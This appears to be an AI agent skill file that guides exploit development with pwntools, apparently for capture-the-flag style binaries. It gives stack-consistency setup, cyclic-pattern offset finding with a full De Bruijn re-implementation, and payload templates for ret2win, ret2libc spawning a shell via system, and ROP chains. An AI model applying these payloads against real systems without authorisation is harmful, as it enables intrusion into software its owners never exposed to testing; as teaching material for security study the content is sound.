---
name: exploit-development
description: Develop working exploits using pwntools. Includes exploit template and common patterns.
---

# Exploit Development

Build working exploits based on vulnerability analysis.

## Exploit Development Process

1. **Start from template** - Use `templates/exploit.py`
2. **Find offset** - Use cyclic pattern
3. **Identify target** - Win function, ROP chain, shellcode
4. **Handle mitigations** - Leak addresses if needed
5. **Build payload** - Padding + control flow hijack
6. **Test locally** - With and without GDB
7. **Test remote** - Adjust for remote environment

## Stack Consistency (CRITICAL)

**Always use fixed argv[0] and empty environment:**

```python
ARGV0 = "/pwn"
ENV = {}

def conn():
    if args.GDB:
        return gdb.debug([EXECUTABLE], env=ENV, argv=[ARGV0], gdbscript='...')
    else:
        return process([EXECUTABLE], env=ENV, argv=[ARGV0])
```

This keeps the stack layout identical between a plain run and a GDB run: the kernel places the argv and environment strings at the top of the stack, so a different program path or a different environment shifts every stack address below them.

## Finding Offset

```python
# Generate pattern
from pwn import cyclic, cyclic_find
payload = cyclic(200)

# After the crash, take the 4-byte pattern value that landed in the
# faulting register (pwndbg: cyclic -l 0x61616168) and map it back to
# the offset at which that window starts in the pattern
offset = cyclic_find(0x61616168)
```
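As an added example (not code from the page or from pwntools), the following re-implements what `cyclic` and `cyclic_find` do, so the technique itself is visible: the pattern is a De Bruijn sequence over the lowercase alphabet with 4-byte windows, so every 4-byte window occurs exactly once and the value found in a register after the crash maps to a single offset. It also handles the cases a practitioner hits in practice: a register value that is not pattern data (returns -1), a 64-bit register value looked up with the 4-byte default (only the low 4 bytes are used), and a length request that would make the pattern repeat. `ALPHABET`, `N` and `_full_pattern` are this example's own names; the output is intended to match pwntools' default settings, so the page's `0x61616168` lookup yields 28 here.

```python
from functools import lru_cache
from string import ascii_lowercase

ALPHABET = ascii_lowercase.encode()  # pwntools' default alphabet
N = 4                                # default window size, as in pwntools

def _de_bruijn(alphabet: bytes, n: int):
    """Yield B(k, n) byte by byte (FKM algorithm): each n-byte window occurs once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t: int, p: int):
        if t > n:
            if n % p == 0:
                for i in a[1:p + 1]:
                    yield alphabet[i]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)

def cyclic(length: int, alphabet: bytes = ALPHABET, n: int = N) -> bytes:
    """First `length` bytes of the pattern; refuses lengths that would repeat a window."""
    if length > len(alphabet) ** n:
        raise ValueError("pattern would repeat; shorten it or increase n")
    out = bytearray()
    for b in _de_bruijn(alphabet, n):
        out.append(b)
        if len(out) == length:
            break
    return bytes(out)

@lru_cache(maxsize=None)
def _full_pattern(alphabet: bytes, n: int) -> bytes:
    return bytes(_de_bruijn(alphabet, n))  # whole sequence, built once per (alphabet, n)

def cyclic_find(value, alphabet: bytes = ALPHABET, n: int = N) -> int:
    """Offset of `value` (raw bytes, or a little-endian int: low n bytes) or -1 if absent."""
    if isinstance(value, int):
        width = max(n, (value.bit_length() + 7) // 8)
        value = value.to_bytes(width, "little")[:n]
    if len(value) != n:
        raise ValueError(f"expected {n} bytes, got {len(value)}")
    return _full_pattern(alphabet, n).find(value)
```

A -1 result means the crashing value did not come from the pattern at all (for example a pointer that was only partially overwritten), which is worth knowing before trusting an offset.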

## Common Payload Patterns

### Simple ret2win

```python
payload = b'A' * offset
payload += p64(win_addr)
```

### ret2win with alignment

```python
payload = b'A' * offset
payload += p64(ret_gadget)  # extra ret keeps the stack 16-byte aligned at the call
payload += p64(win_addr)
```

### ret2libc

```python
payload = b'A' * offset
payload += p64(ret_gadget)
payload += p64(pop_rdi)
payload += p64(binsh_addr)
payload += p64(system_addr)
```

### ROP with pwntools

```python
rop = ROP(elf)
rop.call('function', [arg1, arg2])
payload = b'A' * offset + rop.chain()
```

## Debugging Tips

- `context.log_level = 'debug'` for verbose output
- `gdb.attach(p)` to attach to running process
- `pause()` to stop and inspect
- Print addresses: `print(f"addr: {hex(addr)}")`

## Output

Produce `exploit.py` using the template.
